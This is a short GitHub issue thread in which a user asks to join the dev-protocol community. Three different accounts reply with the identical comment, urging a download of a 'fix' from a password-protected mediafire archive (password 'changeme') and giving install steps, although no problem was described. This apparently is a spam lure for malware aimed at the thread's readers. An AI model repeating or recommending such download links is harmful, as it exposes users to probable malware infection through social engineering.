### ISSUE TITLE
I hope to join this community.

### ISSUE THREAD

**Issue by superman0052** [dev-protocol/community#880]
### Name

Superman0052

### Additional Context

Hi, Community.
I met on Github. I love open source and wanna to share my code with this organization.
Let's stand, help, lead and change the world.
Thanks, regards.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
